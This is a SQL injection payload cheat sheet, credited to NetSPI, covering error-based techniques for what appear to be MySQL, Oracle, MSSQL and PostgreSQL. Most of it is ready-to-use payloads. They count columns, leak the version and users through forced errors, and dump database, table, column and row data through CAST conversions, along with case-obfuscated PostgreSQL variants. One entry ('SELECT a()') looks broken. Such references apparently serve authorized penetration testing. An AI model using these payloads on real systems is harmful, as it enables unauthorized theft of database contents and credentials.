Error Based
Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
| Description | Query |
|---|---|
| Amount of columns using ORDER BY | ORDER BY 1
Add this at the end of your query If you get no error you know ordering is working Increment the number from 1 until you get an error. Then you know the amount of columns for this table |
| Amount of columns using UNION SELECT | UNION SELECT 1,2
Add this at the end of your query Add increment until you see a valid response, e.g. UNION SELECT 1,2,3 If you get no error you know union select is working. You can try to find the values on the page to see where the output goes. |
| XML Parse Error | SELECT extractvalue(rand(),concat(0x3a,(select version()))) |
| Double Query | SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM USERS LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a) Increment Limit 0,1 to Limit 1,1 to begin cycling through data |
| Get Current Database | SELECT a() |
Error Based
Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
| Description | Query |
|---|---|
| Invalid HTTP Request | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual |
| CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
| Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
| Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual |
| Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |
Error Based
Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
| Description | Query |
|---|---|
| Explicit conversion | SELECT convert(int,(SELECT @@version)) SELECT cast((SELECT @@version) as int) |
| Implicit conversion | SELECT 1/@@version |
MSSQL CAST Function Examples
Any of the below queries can be rewritten using the convert function or as an implicit conversion.
| Description | Query |
|---|---|
| Inject a CAST function into the current query | SELECT CAST(@@version as int) |
| Show System User | SELECT CAST(SYSTEM_USER as int); |
| Show all databases in a single line with xml path | SELECT CAST((SELECT name,',' FROM master..sysdatabases FOR XML path('')) as int) SELECT CAST((SELECT name AS "data()" FROM master..sysdatabases FOR xml path('')) AS int); |
| Show Server Name | SELECT CAST(@@SERVERNAME as int); |
| Show Service Name | SELECT CAST(@@SERVICENAME as int); |
| Show List of Databases Note: The query below must be executed in one line. |
DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = ''; SELECT @listStr = @listStr + Name + ',' FROM master..sysdatabases; SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int); |
| Show List of Tables Note: The query below must be executed in one line. |
DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX); SET @listStr = '';SELECT @listStr = @listStr + Name + ',' FROM MYDATABASE..sysobjects WHERE type = 'U'; SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int); |
| Show List of Columns Note: The query below must be executed in one line. |
DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = ''; SELECT @listStr = @listStr + Name + ',' FROM MYDATABASE..syscolumns WHERE id=object_id('MYTABLE'); SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);select cast(@myoutput as int); |
| Show COLUMN Data Note: The query below must be executed in one line. Replace MYCOLUMN with * to select all columns |
DECLARE @listStr VARCHAR(MAX); DECLARE @myoutput VARCHAR(MAX); SET @listStr = ''; SELECT @listStr = @listStr + MYCOLUMN + ',' FROM MYDATABASE..MYTABLE; SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1) SELECT CAST(@myoutput as int); |
| Show database name one at a time Note: Increment the inner top value to get the next record |
SELECT TOP 1 CAST(name as int) FROM sysdatabases WHERE name in (SELECT TOP 2 name FROM sysdatabases ORDER BY name ASC) ORDER BY name DESC |
Error Based
Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
| Query |
|---|
| ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) |
| ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- |
| ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- |
| ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) |
© 2023 Copyright by NetSPI. All rights reserved.